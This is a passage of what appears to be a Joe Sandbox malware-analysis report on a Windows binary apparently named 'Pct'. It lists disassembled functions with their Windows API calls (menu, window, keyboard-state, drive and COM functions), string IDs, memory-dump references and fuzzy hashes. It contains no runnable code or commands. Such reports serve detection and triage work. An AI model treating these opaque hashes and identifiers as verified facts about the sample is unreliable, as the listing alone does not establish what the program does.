                                                                                                                                                  • Instruction ID: ab74f4bfeabf2d183d8c9fc12b3971ca7a66f0583ef6bdeaa84487feb2c37983
                                                                                                                                                  • Opcode Fuzzy Hash: 0dc49f36c2e7afab199207eaab716868cd832a42f44f990ce540813184c1f0e6
                                                                                                                                                  • Instruction Fuzzy Hash: 3902C4301083419FC724EF24C891AAFFBE5EF95304F14496EF495932A2EB30DA89DB52
                                                                                                                                                  Function 00C2AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharLowerBuffW.USER32(?,?,00C50980), ref: 00C2AF4E
                                                                                                                                                  • GetDriveTypeW.KERNEL32(00000061,00C7B5F0,00000061), ref: 00C2B018
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00C2B042
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                  • API String ID: 2820617543-1000479233
                                                                                                                                                  • Opcode ID: 5460ea2697cbf0a45903712ce4287ee9abdb07a2c0ea73742b5e7bb9a7fa1e62
                                                                                                                                                  • Instruction ID: 00100145363459514d9b038e37922f7fcfab7d1ae20941be72ec69db6dfd1f50
                                                                                                                                                  • Opcode Fuzzy Hash: 5460ea2697cbf0a45903712ce4287ee9abdb07a2c0ea73742b5e7bb9a7fa1e62
                                                                                                                                                  • Instruction Fuzzy Hash: 7E51DD701183119BC710EF54DD91AAEB7E5EF90310F10886DF8A6976A2EB70EE49CB42
                                                                                                                                                  Function 00BC4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __i64tow__itow__swprintf
                                                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                                                  • API String ID: 421087845-2263619337
                                                                                                                                                  • Opcode ID: d4d992a9ecd77829993e5d63c04512db26b2513da13a9850702ba9d26437d4d9
                                                                                                                                                  • Instruction ID: 93fa3d5d5666253186872f7746d26803fb49cbc64130d58cc7f6f8befa94cfa2
                                                                                                                                                  • Opcode Fuzzy Hash: d4d992a9ecd77829993e5d63c04512db26b2513da13a9850702ba9d26437d4d9
                                                                                                                                                  • Instruction Fuzzy Hash: 8241E571604209AFDB24EF78C881F7A73E9EB04300F2048EEE64AD7292EB71DE458711
                                                                                                                                                  Function 00C47777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C4778F
                                                                                                                                                  • CreateMenu.USER32 ref: 00C477AA
                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00C477B9
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C47846
                                                                                                                                                  • IsMenu.USER32(?), ref: 00C4785C
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00C47866
                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C47893
                                                                                                                                                  • DrawMenuBar.USER32 ref: 00C4789B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                  • String ID: 0$F
                                                                                                                                                  • API String ID: 176399719-3044882817
                                                                                                                                                  • Opcode ID: 14b246361b311f01eb0d2bf090578bd720fff6e089acd7628bc4435d9659533b
                                                                                                                                                  • Instruction ID: 1d439f55a36aa278bc526516c38802a633e831898dc0f7ba66ad257713f32394
                                                                                                                                                  • Opcode Fuzzy Hash: 14b246361b311f01eb0d2bf090578bd720fff6e089acd7628bc4435d9659533b
                                                                                                                                                  • Instruction Fuzzy Hash: 02411578A00309EFDB10DF64D888B9ABBB5FF49311F244269ED56A73A1D731AA10CF54
                                                                                                                                                  Function 00C47AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C47B83
                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00C47B8A
                                                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C47B9D
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C47BA5
                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C47BB0
                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00C47BB9
                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00C47BC3
                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C47BD7
                                                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C47BE3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                  • String ID: static
                                                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                                                  • Opcode ID: 5614f36d6438fdea76faae0822f56e2d7e5a78704d69c8f61d1870dbe9fb395d
                                                                                                                                                  • Instruction ID: 2a55cb731dde3a8dce22baaa2096d4a4e8713e67a7c94ddde6dc71df81b72b6d
                                                                                                                                                  • Opcode Fuzzy Hash: 5614f36d6438fdea76faae0822f56e2d7e5a78704d69c8f61d1870dbe9fb395d
                                                                                                                                                  • Instruction Fuzzy Hash: 72316836104219ABDF129F64DC49FDF3B69FF09321F200315FA65A61A0CB31D960DBA4
                                                                                                                                                  Function 00BE7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00BE706B
                                                                                                                                                    • Part of subcall function 00BE8D58: __getptd_noexit.LIBCMT ref: 00BE8D58
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00BE7104
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00BE713A
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00BE7157
                                                                                                                                                  • __allrem.LIBCMT ref: 00BE71AD
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE71C9
                                                                                                                                                  • __allrem.LIBCMT ref: 00BE71E0
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE71FE
                                                                                                                                                  • __allrem.LIBCMT ref: 00BE7215
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE7233
                                                                                                                                                  • __invoke_watson.LIBCMT ref: 00BE72A4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 384356119-0
                                                                                                                                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                                  • Instruction ID: 7c0bbeef7a43c7dbc020a52de1d15dd21b350ba43375ef67013fa0b0f9dc0f78
                                                                                                                                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                                  • Instruction Fuzzy Hash: DB710871A44747ABD7149F7ACC81B6AB3E8EF11720F1442AAF614E7282EF70D94487D1
                                                                                                                                                  Function 00C22CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C22CE9
                                                                                                                                                  • GetMenuItemInfoW.USER32(00C87890,000000FF,00000000,00000030,?,000000FF,?,?), ref: 00C22D4A
                                                                                                                                                  • SetMenuItemInfoW.USER32(00C87890,00000004,00000000,00000030), ref: 00C22D80
                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00C22D92
                                                                                                                                                  • GetMenuItemCount.USER32(?,?,000000FF,?,?), ref: 00C22DD6
                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C22DF2
                                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00C22E1C
                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00C22E61
                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C22EA7
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030,?,000000FF,?,?), ref: 00C22EBB
                                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C22EDC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4176008265-0
                                                                                                                                                  • Opcode ID: bfed83dbb6327430493265c2d346edc0a692a902cfb9975b1e5cf8715603bae1
                                                                                                                                                  • Instruction ID: 33dd61c7b636274828ae678562ca44edee4fbcbc500bf5f5adebada27dfddd92
                                                                                                                                                  • Opcode Fuzzy Hash: bfed83dbb6327430493265c2d346edc0a692a902cfb9975b1e5cf8715603bae1
                                                                                                                                                  • Instruction Fuzzy Hash: 4761B270900259BFDB11CF64EC88ABEBBB8EB01306F250159F851A7651EB35AE45EB21
                                                                                                                                                  Function 00C47548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 00C475CA
                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 00C475CD
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 00C475F1
                                                                                                                                                  • _memset.LIBCMT ref: 00C47602
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C47614
                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007,?,00000000,00C877C4), ref: 00C4768C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 830647256-0
                                                                                                                                                  • Opcode ID: 220f6cb579e1c9b309412e1f86628b1cda5843f9e4039c710bf8ee9f388b33b8
                                                                                                                                                  • Instruction ID: e669425375632a589cbbee78fdc2b351a2a9429562360bb0a64086157a38f820
                                                                                                                                                  • Opcode Fuzzy Hash: 220f6cb579e1c9b309412e1f86628b1cda5843f9e4039c710bf8ee9f388b33b8
                                                                                                                                                  • Instruction Fuzzy Hash: 90616B75904208AFDB11DFA4CC85FEE77F8BB49710F200299FA14A72A2D774AE41DB60
                                                                                                                                                  Function 00C177B6 Relevance: 16.6, APIs: 11, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #41.OLEAUT32(0000000C,?,?,?,?,?,?,?,?,00C1756E,?,?,?,?,?,00C1779C), ref: 00C177DD
                                                                                                                                                  • #37.OLEAUT32(?,?,?,?,?,?,?,00C1756E,?,?,?,?,?,00C1779C,?,?), ref: 00C17836
                                                                                                                                                  • #8.OLEAUT32(?,?,?,?,?,?,?,00C1756E,?,?,?,?,?,00C1779C,?,?), ref: 00C17848
                                                                                                                                                  • #23.OLEAUT32(?,?,?,?,?,?,?,?,00C1756E), ref: 00C17868
                                                                                                                                                  • #10.OLEAUT32(?,?,00000002,?,?,?,?,?,?,?,00C1756E), ref: 00C178BB
                                                                                                                                                  • #24.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00C1756E), ref: 00C178CF
                                                                                                                                                  • #9.OLEAUT32(?,?,?,?,?,?,?,00C1756E), ref: 00C178E4
                                                                                                                                                  • #39.OLEAUT32(?,?,?,?,?,?,?,00C1756E), ref: 00C178F1
                                                                                                                                                  • #38.OLEAUT32(?,?,?,?,?,?,?,00C1756E), ref: 00C178FA
                                                                                                                                                  • #9.OLEAUT32(?,?,?,?,?,?,?,00C1756E), ref: 00C1790C
                                                                                                                                                  • #38.OLEAUT32(?,?,?,?,?,?,?,00C1756E,?,?,?,?,?,00C1779C,?,?), ref: 00C17917
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 890fbc5d688ab029ffd60897febfdf4b17c01ed77b76f54d456ba72ee1c23f1e
                                                                                                                                                  • Instruction ID: 185627567d4b7c7ecf38df5bfbad96a75b59db749661c6637b78606065d1ac18
                                                                                                                                                  • Opcode Fuzzy Hash: 890fbc5d688ab029ffd60897febfdf4b17c01ed77b76f54d456ba72ee1c23f1e
                                                                                                                                                  • Instruction Fuzzy Hash: 6D415F35A002199FDB00DFA4C848EEDBBB9FF09311F108169E955E7261CB30AA85DFA0
                                                                                                                                                  Function 00C20508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00C20530
                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00C205B1
                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00C205CC
                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00C205E6
                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00C205FB
                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00C20613
                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00C20625
                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00C2063D
                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00C2064F
                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00C20667
                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00C20679
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                  • Opcode ID: a3bfb7f34aedd260688ce3925f42a20994fd906bbd52338f8292634f3feaf3e7
                                                                                                                                                  • Instruction ID: dc66ced85005a0dcfd4fdcc5f1b439d56a5a8786c45e35ee6feabb2b2193176a
                                                                                                                                                  • Opcode Fuzzy Hash: a3bfb7f34aedd260688ce3925f42a20994fd906bbd52338f8292634f3feaf3e7
                                                                                                                                                  • Instruction Fuzzy Hash: 1B4108745047DA6DFF308764A8043B5BEA06B51300F28405FE9D5969C3EBA89BD8CF96
                                                                                                                                                  Function 00C38AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                  • CoInitialize.OLE32 ref: 00C38AED
                                                                                                                                                  • CoUninitialize.OLE32 ref: 00C38AF8
                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00C53BBC,?), ref: 00C38B58
                                                                                                                                                  • IIDFromString.OLE32(?,?), ref: 00C38BCB
                                                                                                                                                  • #8.OLEAUT32(?), ref: 00C38C65
                                                                                                                                                  • #9.OLEAUT32(?,?), ref: 00C38CC6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFromInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                  • API String ID: 1994486276-1287834457
                                                                                                                                                  • Opcode ID: 13072dceac6862a9a40e9bdd7286b6b9c603375dede56e26b2b5719ce9667f94
                                                                                                                                                  • Instruction ID: a5c8bbba4505509da6ca85a19891b11ec363dab7ded4575f07027d3031b0eeca
                                                                                                                                                  • Opcode Fuzzy Hash: 13072dceac6862a9a40e9bdd7286b6b9c603375dede56e26b2b5719ce9667f94
                                                                                                                                                  • Instruction Fuzzy Hash: A461A0702187119FC710DF25D889F6EB7E8AF44714F14485DF9959B291CB70EE88CBA2
                                                                                                                                                  Function 00C2BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2BB13
                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C2BB89
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00C2BB93
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00C2BC00
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                                  • Opcode ID: fe6cbfbb2b71ccd4fc4751110f04e6ec838c6c6c6acc900cc338e12e52f239ed
                                                                                                                                                  • Instruction ID: f70bd5590909f5615b0ce402b1a5501348f3d8beed95d2194d4634472389949a
                                                                                                                                                  • Opcode Fuzzy Hash: fe6cbfbb2b71ccd4fc4751110f04e6ec838c6c6c6acc900cc338e12e52f239ed
                                                                                                                                                  • Instruction Fuzzy Hash: 4E31B435A00319AFC710DF69D855FADB7B8EF44310F1480AAE819E7695DB70AE41CB91
                                                                                                                                                  Function 00C19B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C1B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B7BD
                                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 00C19BCC
                                                                                                                                                  • GetDlgCtrlID.USER32(?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 00C19BD7
                                                                                                                                                  • GetParent.USER32(?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 00C19BF3
                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 00C19BF6
